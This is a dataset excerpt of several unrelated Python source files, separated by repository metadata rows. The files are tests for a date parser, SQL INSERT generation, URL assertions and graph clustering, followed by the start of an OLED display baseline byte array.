assert 3 == parsed.month
assert 1 == parsed.day
text = "2012-03-13"
parsed = parse(text, exact=True)
assert isinstance(parsed, datetime.date)
assert 2012 == parsed.year
assert 3 == parsed.month
assert 13 == parsed.day
text = "2012W055"
parsed = parse(text, exact=True)
assert isinstance(parsed, datetime.date)
assert 2012 == parsed.year
assert 2 == parsed.month
assert 3 == parsed.day
text = "2012007"
parsed = parse(text, exact=True)
assert isinstance(parsed, datetime.date)
assert 2012 == parsed.year
assert 1 == parsed.month
assert 7 == parsed.day
text = "20:12:05"
parsed = parse(text, exact=True)
assert isinstance(parsed, datetime.time)
assert 20 == parsed.hour
assert 12 == parsed.minute
assert 5 == parsed.second
assert 0 == parsed.microsecond
def test_edge_cases():
text = "2013-11-1"
parsed = parse(text, strict=False)
assert 2013 == parsed.year
assert 11 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "10-01-01"
parsed = parse(text, strict=False)
assert 2010 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "31-01-01"
parsed = parse(text, strict=False)
assert 2031 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
text = "32-01-01"
parsed = parse(text, strict=False)
assert 2032 == parsed.year
assert 1 == parsed.month
assert 1 == parsed.day
assert 0 == parsed.hour
assert 0 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_strict():
text = "4 Aug 2015 - 11:20 PM"
with pytest.raises(ParserError):
parse(text)
parsed = parse(text, strict=False)
assert 2015 == parsed.year
assert 8 == parsed.month
assert 4 == parsed.day
assert 23 == parsed.hour
assert 20 == parsed.minute
assert 0 == parsed.second
assert 0 == parsed.microsecond
assert parsed.tzinfo is None
def test_invalid():
text = "201610T"
with pytest.raises(ParserError):
parse(text)
text = "2012-W54"
with pytest.raises(ParserError):
parse(text)
text = "2012-W13-8"
with pytest.raises(ParserError):
parse(text)
# W53 in normal year (not long)
text = "2017W53"
with pytest.raises(ParserError):
parse(text)
def test_exif_edge_case():
text = "2016:12:26 15:45:28"
parsed = parse(text)
assert 2016 == parsed.year
assert 12 == parsed.month
assert 26 == parsed.day
assert 15 == parsed.hour
assert 45 == parsed.minute
assert 28 == parsed.second
| 22.678832
| 54
| 0.637206
| 2,063
| 15,535
| 4.773146
| 0.066408
| 0.082462
| 0.153143
| 0.069463
| 0.908297
| 0.896618
| 0.868793
| 0.84899
| 0.805931
| 0.786839
| 0
| 0.101511
| 0.258706
| 15,535
| 684
| 55
| 22.711988
| 0.75356
| 0.00251
| 0
| 0.814961
| 0
| 0
| 0.042342
| 0.009875
| 0
| 0
| 0
| 0
| 0.722441
| 1
| 0.03937
| false
| 0
| 0.009843
| 0
| 0.049213
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bce055ca1ad9cfcef9b6f48034c84525245dfb4b
| 2,042
|
py
|
Python
|
tests/standard/test_standard_insert.py
|
uranusjr/sqlian
|
8f029e91af032e23ebb95cb599aa7267ebe75e05
|
[
"0BSD"
] | null | null | null |
tests/standard/test_standard_insert.py
|
uranusjr/sqlian
|
8f029e91af032e23ebb95cb599aa7267ebe75e05
|
[
"0BSD"
] | null | null | null |
tests/standard/test_standard_insert.py
|
uranusjr/sqlian
|
8f029e91af032e23ebb95cb599aa7267ebe75e05
|
[
"0BSD"
] | null | null | null |
from sqlian import Sql
def test_insert(engine):
sql = engine.insert(
'person', columns=('person_id', 'name'), values=('mosky', 'Mosky Liu'),
)
assert sql == Sql(
'''INSERT INTO "person" ("person_id", "name") '''
'''VALUES ('mosky', 'Mosky Liu')'''
)
def test_insert_values(engine):
sql = engine.insert('person', values=('mosky', 'Mosky Liu'))
assert sql == Sql('''
INSERT INTO "person" VALUES ('mosky', 'Mosky Liu')
'''.strip())
def test_insert_values_multiple(engine):
sql = engine.insert('person', values=[
('mosky', 'Mosky Liu'),
('yiyu', 'Yi-Yu Liu'),
])
assert sql == Sql(
'INSERT INTO "person" '
"VALUES ('mosky', 'Mosky Liu'), ('yiyu', 'Yi-Yu Liu')"
)
def test_insert_dict(engine):
sql = engine.insert(
'person', values={'person_id': 'mosky', 'name': 'Mosky Liu'},
)
assert sql in ( # Either order works.
Sql('''INSERT INTO "person" ("person_id", "name") '''
'''VALUES ('mosky', 'Mosky Liu')'''),
Sql('''INSERT INTO "person" ("name", "person_id") '''
'''VALUES ('Mosky Liu', 'mosky')'''),
)
def test_insert_dict_multiple(engine):
sql = engine.insert(
'person', values=[
{'person_id': 'mosky', 'name': 'Mosky Liu'},
{'name': 'Yi-Yu Liu', 'person_id': 'yiyu'},
],
)
assert sql in ( # Either order works.
Sql('''INSERT INTO "person" ("person_id", "name") '''
'''VALUES ('mosky', 'Mosky Liu'), ('yiyu', 'Yi-Yu Liu')'''),
Sql('''INSERT INTO "person" ("name", "person_id") '''
'''VALUES ('Mosky Liu', 'mosky'), ('Yi-Yu Liu', 'yiyu')'''),
)
def test_insert_empty_values(engine):
sql = engine.insert('person', values=())
assert sql == Sql('''INSERT INTO "person" VALUES ()''')
def test_insert_empty_values_multiple(engine):
sql = engine.insert('person', values=[(), (), ()])
assert sql == Sql("""INSERT INTO "person" VALUES (), (), ()""")
| 29.594203
| 79
| 0.533301
| 230
| 2,042
| 4.617391
| 0.121739
| 0.090395
| 0.110169
| 0.161017
| 0.870057
| 0.810734
| 0.810734
| 0.780603
| 0.746704
| 0.660075
| 0
| 0
| 0.250245
| 2,042
| 68
| 80
| 30.029412
| 0.693664
| 0.019099
| 0
| 0.3
| 0
| 0
| 0.327746
| 0
| 0
| 0
| 0
| 0
| 0.14
| 1
| 0.14
| false
| 0
| 0.02
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcfce7b6435d5beb2620bc014aaed688c4bd0d5d
| 1,190
|
py
|
Python
|
src/sst/selftests/url.py
|
DramaFever/sst
|
63d41a102c9d3bdb54019f28a93cff0314a0214f
|
[
"Apache-2.0"
] | 4
|
2015-01-21T22:20:50.000Z
|
2017-12-18T11:38:16.000Z
|
src/sst/selftests/url.py
|
DramaFever/sst
|
63d41a102c9d3bdb54019f28a93cff0314a0214f
|
[
"Apache-2.0"
] | 63
|
2015-01-13T19:32:06.000Z
|
2020-04-22T17:01:03.000Z
|
src/sst/selftests/url.py
|
wbdl/sst
|
7a2805391fdd390ecb0f488f8377f58381358c89
|
[
"Apache-2.0"
] | null | null | null |
import sst
import sst.actions
# tests go_to, assert_url, assert_title, set_base_url
# reset_base_url, get_base_url
sst.actions.set_base_url('http://localhost:%s/' % sst.DEVSERVER_PORT)
sst.actions.go_to('/')
sst.actions.assert_url('/')
sst.actions.fails(sst.actions.assert_url, '/foo')
sst.actions.set_base_url('localhost:%s' % sst.DEVSERVER_PORT)
assert sst.actions.get_base_url() == 'http://localhost:%s' % sst.DEVSERVER_PORT
sst.actions.set_base_url('http://localhost:%s/' % sst.DEVSERVER_PORT)
assert (sst.actions.get_base_url()
== 'http://localhost:%s/' % sst.DEVSERVER_PORT)
sst.actions.go_to('/')
# assert_url adds the base url for relative urls
# so test both ways
sst.actions.assert_url('http://localhost:%s/' % sst.DEVSERVER_PORT)
sst.actions.assert_url('/')
sst.actions.fails(sst.actions.assert_url, '/begin/')
# assert_url works also without the trailing slash
sst.actions.assert_url('http://localhost:%s' % sst.DEVSERVER_PORT)
sst.actions.reset_base_url()
assert sst.actions.get_base_url() is None
sst.actions.set_base_url('http://localhost:%s/' % sst.DEVSERVER_PORT)
sst.actions.go_to('/')
sst.actions.assert_url('http://localhost:%s/' % sst.DEVSERVER_PORT)
| 32.162162
| 79
| 0.747899
| 188
| 1,190
| 4.489362
| 0.196809
| 0.248815
| 0.138626
| 0.234597
| 0.757109
| 0.733412
| 0.702607
| 0.702607
| 0.702607
| 0.702607
| 0
| 0
| 0.084034
| 1,190
| 36
| 80
| 33.055556
| 0.774312
| 0.163025
| 0
| 0.47619
| 0
| 0
| 0.187879
| 0
| 0
| 0
| 0
| 0
| 0.47619
| 1
| 0
| true
| 0
| 0.095238
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4c4b3b487239d8ea9369022055bd26d4109a6996
| 14,385
|
py
|
Python
|
python/graphscope/nx/algorithms/tests/builtin/test_cluster.py
|
lnfjpt/GraphScope
|
917146f86d8387302a2e1de6963115e7568bf3ee
|
[
"Apache-2.0"
] | 1
|
2021-12-30T02:55:16.000Z
|
2021-12-30T02:55:16.000Z
|
python/graphscope/nx/algorithms/tests/builtin/test_cluster.py
|
lnfjpt/GraphScope
|
917146f86d8387302a2e1de6963115e7568bf3ee
|
[
"Apache-2.0"
] | null | null | null |
python/graphscope/nx/algorithms/tests/builtin/test_cluster.py
|
lnfjpt/GraphScope
|
917146f86d8387302a2e1de6963115e7568bf3ee
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# This file test_cluster.py is referred and derived from project NetworkX
#
# which has the following license:
#
# Copyright (C) 2004-2020, NetworkX Developers
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
#
import pytest
from graphscope import nx
@pytest.mark.usefixtures("graphscope_session")
class TestTriangles:
def test_empty(self):
G = nx.Graph()
assert list(nx.builtin.triangles(G).values()) == []
def test_path(self):
G = nx.path_graph(10)
assert list(nx.builtin.triangles(G).values()) == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
assert nx.builtin.triangles(G) == {
0: 0,
1: 0,
2: 0,
3: 0,
4: 0,
5: 0,
6: 0,
7: 0,
8: 0,
9: 0,
}
def test_cubical(self):
G = nx.cubical_graph()
assert list(nx.builtin.triangles(G).values()) == [0, 0, 0, 0, 0, 0, 0, 0]
assert nx.builtin.triangles(G, 1) == 0
assert list(nx.builtin.triangles(G, [1, 2]).values()) == [0, 0]
assert nx.builtin.triangles(G, 1) == 0
assert nx.builtin.triangles(G, [1, 2]) == {1: 0, 2: 0}
def test_k5(self):
G = nx.complete_graph(5)
assert list(nx.builtin.triangles(G).values()) == [6, 6, 6, 6, 6]
assert sum(nx.builtin.triangles(G).values()) / 3.0 == 10
assert nx.builtin.triangles(G, 1) == 6
G.remove_edge(1, 2)
assert list(dict(sorted(nx.builtin.triangles(G).items())).values()) == [
5,
3,
3,
5,
5,
]
assert nx.builtin.triangles(G, 1) == 3
@pytest.mark.usefixtures("graphscope_session")
class TestDirectedClustering:
def test_clustering(self):
G = nx.DiGraph()
assert list(nx.builtin.clustering(G).values()) == []
assert nx.builtin.clustering(G) == {}
def test_path(self):
G = nx.path_graph(10, create_using=nx.DiGraph())
assert list(nx.builtin.clustering(G).values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.builtin.clustering(G) == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_k5(self):
G = nx.complete_graph(5, create_using=nx.DiGraph())
assert list(nx.builtin.clustering(G).values()) == [1, 1, 1, 1, 1]
assert nx.builtin.average_clustering(G) == 1
G.remove_edge(1, 2)
assert list(dict(sorted(nx.builtin.clustering(G).items())).values()) == [
11.0 / 12.0,
1.0,
1.0,
11.0 / 12.0,
11.0 / 12.0,
]
assert nx.builtin.clustering(G, [1, 4]) == {1: 1.0, 4: 11.0 / 12.0}
G.remove_edge(2, 1)
assert list(dict(sorted(nx.builtin.clustering(G).items())).values()) == [
5.0 / 6.0,
1.0,
1.0,
5.0 / 6.0,
5.0 / 6.0,
]
assert nx.builtin.clustering(G, [1, 4]) == {1: 1.0, 4: 0.83333333333333337}
def test_triangle_and_edge(self):
G = nx.cycle_graph(3, create_using=nx.DiGraph())
G.add_edge(0, 4)
assert nx.builtin.clustering(G)[0] == 1.0 / 6.0
@pytest.mark.usefixtures("graphscope_session")
class TestDirectedWeightedClustering:
def test_clustering(self):
G = nx.DiGraph()
assert list(nx.builtin.clustering(G, weight="weight").values()) == []
assert nx.builtin.clustering(G) == {}
def test_path(self):
G = nx.path_graph(10, create_using=nx.DiGraph())
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.builtin.clustering(G, weight="weight") == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_k5(self):
G = nx.complete_graph(5, create_using=nx.DiGraph())
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
1,
1,
1,
1,
1,
]
assert nx.builtin.average_clustering(G, weight="weight") == 1
G.remove_edge(1, 2)
assert G.number_of_nodes() == 5
assert list(
dict(sorted(nx.builtin.clustering(G, weight="weight").items())).values()
) == [
11.0 / 12.0,
1.0,
1.0,
11.0 / 12.0,
11.0 / 12.0,
]
assert nx.builtin.clustering(G, [1, 4], weight="weight") == {
1: 1.0,
4: 11.0 / 12.0,
}
G.remove_edge(2, 1)
assert list(
dict(sorted(nx.builtin.clustering(G, weight="weight").items())).values()
) == [
5.0 / 6.0,
1.0,
1.0,
5.0 / 6.0,
5.0 / 6.0,
]
assert nx.builtin.clustering(G, [1, 4], weight="weight") == {
1: 1.0,
4: 0.83333333333333337,
}
def test_triangle_and_edge(self):
G = nx.cycle_graph(3, create_using=nx.DiGraph())
G.add_edge(0, 4, weight=2)
assert nx.builtin.clustering(G)[0] == 1.0 / 6.0
assert nx.builtin.clustering(G, weight="weight")[0] == 1.0 / 12.0
@pytest.mark.usefixtures("graphscope_session")
class TestWeightedClustering:
def test_clustering(self):
G = nx.Graph()
assert list(nx.builtin.clustering(G, weight="weight").values()) == []
assert nx.builtin.clustering(G) == {}
def test_path(self):
G = nx.path_graph(10)
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.builtin.clustering(G, weight="weight") == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_cubical(self):
G = nx.cubical_graph()
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
0,
0,
0,
0,
0,
0,
0,
0,
]
assert nx.builtin.clustering(G, 1) == 0
assert list(nx.builtin.clustering(G, [1, 2], weight="weight").values()) == [
0,
0,
]
assert nx.builtin.clustering(G, 1, weight="weight") == 0
assert nx.builtin.clustering(G, [1, 2], weight="weight") == {1: 0, 2: 0}
def test_k5(self):
G = nx.complete_graph(5)
assert list(nx.builtin.clustering(G, weight="weight").values()) == [
1,
1,
1,
1,
1,
]
assert nx.builtin.average_clustering(G, weight="weight") == 1
G.remove_edge(1, 2)
assert list(
dict(sorted(nx.builtin.clustering(G, weight="weight").items())).values()
) == [
5.0 / 6.0,
1.0,
1.0,
5.0 / 6.0,
5.0 / 6.0,
]
assert nx.builtin.clustering(G, [1, 4], weight="weight") == {
1: 1.0,
4: 0.83333333333333337,
}
def test_triangle_and_edge(self):
G = nx.cycle_graph(3)
G.add_edge(0, 4, weight=2)
assert nx.builtin.clustering(G)[0] == 1.0 / 3.0
assert nx.builtin.clustering(G, weight="weight")[0] == 1.0 / 6.0
@pytest.mark.usefixtures("graphscope_session")
class TestClustering:
def test_clustering(self):
G = nx.Graph()
assert list(nx.builtin.clustering(G).values()) == []
assert nx.builtin.clustering(G) == {}
def test_path(self):
G = nx.path_graph(10)
assert list(nx.builtin.clustering(G).values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.builtin.clustering(G) == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_cubical(self):
G = nx.cubical_graph()
assert list(nx.builtin.clustering(G).values()) == [0, 0, 0, 0, 0, 0, 0, 0]
assert nx.builtin.clustering(G, 1) == 0
assert list(nx.builtin.clustering(G, [1, 2]).values()) == [0, 0]
assert nx.builtin.clustering(G, 1) == 0
assert nx.builtin.clustering(G, [1, 2]) == {1: 0, 2: 0}
def test_k5(self):
G = nx.complete_graph(5)
assert list(nx.builtin.clustering(G).values()) == [1, 1, 1, 1, 1]
assert nx.builtin.average_clustering(G) == 1
G.remove_edge(1, 2)
assert list(dict(sorted(nx.builtin.clustering(G).items())).values()) == [
5.0 / 6.0,
1.0,
1.0,
5.0 / 6.0,
5.0 / 6.0,
]
assert nx.builtin.clustering(G, [1, 4]) == {1: 1.0, 4: 0.83333333333333337}
@pytest.mark.usefixtures("graphscope_session")
@pytest.mark.skip(reason="output not ready, wait to check.")
class TestTransitivity:
def test_transitivity(self):
G = nx.Graph()
assert nx.builtin.transitivity(G) == 0.0
def test_path(self):
G = nx.path_graph(10)
assert nx.builtin.transitivity(G) == 0.0
def test_cubical(self):
G = nx.cubical_graph()
assert nx.builtin.transitivity(G) == 0.0
def test_k5(self):
G = nx.complete_graph(5)
assert nx.builtin.transitivity(G) == 1.0
G.remove_edge(1, 2)
assert nx.builtin.transitivity(G) == 0.875
@pytest.mark.usefixtures("graphscope_session")
@pytest.mark.skip(reason="output not ready, wait to check.")
class TestSquareClustering:
def test_clustering(self):
G = nx.Graph()
assert list(nx.square_clustering(G).values()) == []
assert nx.square_clustering(G) == {}
def test_path(self):
G = nx.path_graph(10)
assert list(nx.square_clustering(G).values()) == [
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
assert nx.square_clustering(G) == {
0: 0.0,
1: 0.0,
2: 0.0,
3: 0.0,
4: 0.0,
5: 0.0,
6: 0.0,
7: 0.0,
8: 0.0,
9: 0.0,
}
def test_cubical(self):
G = nx.cubical_graph()
assert list(nx.square_clustering(G).values()) == [
0.5,
0.5,
0.5,
0.5,
0.5,
0.5,
0.5,
0.5,
]
assert list(nx.square_clustering(G, [1, 2]).values()) == [0.5, 0.5]
assert nx.square_clustering(G, [1])[1] == 0.5
assert nx.square_clustering(G, [1, 2]) == {1: 0.5, 2: 0.5}
def test_k5(self):
G = nx.complete_graph(5)
assert list(nx.square_clustering(G).values()) == [1, 1, 1, 1, 1]
def test_bipartite_k5(self):
G = nx.complete_bipartite_graph(5, 5)
assert list(nx.square_clustering(G).values()) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
def test_lind_square_clustering(self):
"""Test C4 for figure 1 Lind et al (2005)"""
G = nx.Graph(
[
(1, 2),
(1, 3),
(1, 6),
(1, 7),
(2, 4),
(2, 5),
(3, 4),
(3, 5),
(6, 7),
(7, 8),
(6, 8),
(7, 9),
(7, 10),
(6, 11),
(6, 12),
(2, 13),
(2, 14),
(3, 15),
(3, 16),
]
)
G1 = G.subgraph([1, 2, 3, 4, 5, 13, 14, 15, 16])
G2 = G.subgraph([1, 6, 7, 8, 9, 10, 11, 12])
assert nx.square_clustering(G, [1])[1] == 3 / 75.0
assert nx.square_clustering(G1, [1])[1] == 2 / 6.0
assert nx.square_clustering(G2, [1])[1] == 1 / 5.0
@pytest.mark.usefixtures("graphscope_session")
def test_average_clustering():
G = nx.cycle_graph(3)
G.add_edge(2, 3)
assert nx.builtin.average_clustering(G) == pytest.approx(
(1 + 1 + 1 / 3.0) / 4.0, rel=1e-9, abs=1e-12
)
assert nx.builtin.average_clustering(G, count_zeros=True) == pytest.approx(
(1 + 1 + 1 / 3.0) / 4.0, rel=1e-9, abs=1e-12
)
assert nx.builtin.average_clustering(G, count_zeros=False) == pytest.approx(
(1 + 1 + 1 / 3.0) / 3.0, rel=1e-9, abs=1e-12
)
@pytest.mark.usefixtures("graphscope_session")
@pytest.mark.skip(reason="output not ready, wait to check.")
class TestGeneralizedDegree:
def test_generalized_degree(self):
G = nx.Graph()
assert nx.generalized_degree(G) == {}
def test_path(self):
G = nx.path_graph(5)
assert nx.generalized_degree(G, 0) == {0: 1}
assert nx.generalized_degree(G, 1) == {0: 2}
def test_cubical(self):
G = nx.cubical_graph()
assert nx.generalized_degree(G, 0) == {0: 3}
def test_k5(self):
G = nx.complete_graph(5)
assert nx.generalized_degree(G, 0) == {3: 4}
G.remove_edge(0, 1)
assert nx.generalized_degree(G, 0) == {2: 3}
| 28.428854
| 87
| 0.467709
| 1,939
| 14,385
| 3.400722
| 0.076328
| 0.057325
| 0.05505
| 0.064907
| 0.861692
| 0.840764
| 0.792539
| 0.751744
| 0.706855
| 0.690931
| 0
| 0.102781
| 0.375043
| 14,385
| 505
| 88
| 28.485149
| 0.630701
| 0.030518
| 0
| 0.702273
| 0
| 0
| 0.028009
| 0
| 0
| 0
| 0
| 0
| 0.209091
| 1
| 0.081818
| false
| 0
| 0.004545
| 0
| 0.104545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c6c6126959fd9ff5179773780e63e5f541bf0a7
| 49,972
|
py
|
Python
|
tests/baseline_data.py
|
4gbag/ssd1306
|
f856c224f07cac74b618f2e6aeb7ebe23bc199ba
|
[
"MIT"
] | 1
|
2020-03-21T07:41:50.000Z
|
2020-03-21T07:41:50.000Z
|
tests/baseline_data.py
|
4gbag/ssd1306
|
f856c224f07cac74b618f2e6aeb7ebe23bc199ba
|
[
"MIT"
] | null | null | null |
tests/baseline_data.py
|
4gbag/ssd1306
|
f856c224f07cac74b618f2e6aeb7ebe23bc199ba
|
[
"MIT"
] | 2
|
2020-03-24T07:33:37.000Z
|
2020-03-24T07:35:01.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def primitives(device, draw):
padding = 2
shape_width = 20
top = padding
bottom = device.height - padding - 1
draw.rectangle(device.bounding_box, outline="white", fill="black")
x = padding
draw.ellipse((x, top, x + shape_width, bottom), outline="red", fill="black")
x += shape_width + padding
draw.rectangle((x, top, x + shape_width, bottom), outline="blue", fill="black")
x += shape_width + padding
draw.polygon([(x, bottom), (x + shape_width / 2, top), (x + shape_width, bottom)], outline="green", fill="black")
x += shape_width + padding
draw.line((x, bottom, x + shape_width, top), fill="yellow")
draw.line((x, top, x + shape_width, bottom), fill="yellow")
x += shape_width + padding
draw.text((x, top), 'Hello', fill="cyan")
draw.text((x, top + 20), 'World!', fill="purple")
# These datasets are purely to prevent regression bugs from creeping in
demo_ssd1306 = [
255, 1, 1, 1, 1, 1, 1, 1, 1, 129, 193, 65, 193, 129, 1, 1, 241, 241, 17,
17, 1, 1, 241, 241, 17, 17, 1, 129, 193, 65, 193, 129, 33, 225, 225, 129,
225, 225, 1, 13, 113, 129, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
129, 113, 13, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 225, 29, 225, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 253, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5,
253, 1, 1, 1, 1, 1, 129, 97, 25, 9, 5, 5, 5, 5, 5, 9, 25, 97, 129, 1, 1, 1,
1, 1, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 3, 7, 4, 7, 3, 4, 4, 7, 7, 4, 4, 4,
4, 7, 7, 4, 4, 0, 5, 5, 5, 7, 3, 4, 7, 7, 0, 7, 7, 0, 0, 0, 3, 28, 224, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 28, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
248, 7, 0, 7, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 240, 14, 1, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 1, 14, 240, 0, 0, 0, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 126, 1, 0, 0, 0, 1, 126, 128, 0, 0, 0, 0,
0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
0, 192, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 63, 192, 0,
255, 255, 0, 0, 0, 0, 94, 94, 0, 64, 127, 127, 69, 124, 56, 64, 64, 127,
127, 65, 65, 12, 4, 76, 120, 124, 68, 0, 56, 124, 68, 124, 56, 2, 30, 112,
62, 112, 30, 0, 0, 0, 0, 0, 0, 0, 0, 1, 14, 112, 128, 112, 14, 1, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 31, 0, 0, 0, 0, 0, 0, 0, 31, 224, 0, 0,
0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
0, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
128, 112, 14, 1, 14, 112, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 7,
0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 248, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 224, 28, 3, 0, 0, 0, 0, 0, 3, 28, 224, 0, 0, 0,
0, 0, 0, 0, 0, 128, 126, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 126, 128,
0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
0, 1, 126, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 126, 1,
0, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 224, 31, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 224, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 7, 56, 192, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 192, 56, 7, 0, 0, 0, 255, 255, 128, 128, 128, 128, 128,
128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128,
128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 128,
128, 128, 128, 176, 142, 129, 128, 128, 128, 128, 128, 128, 128, 128, 128,
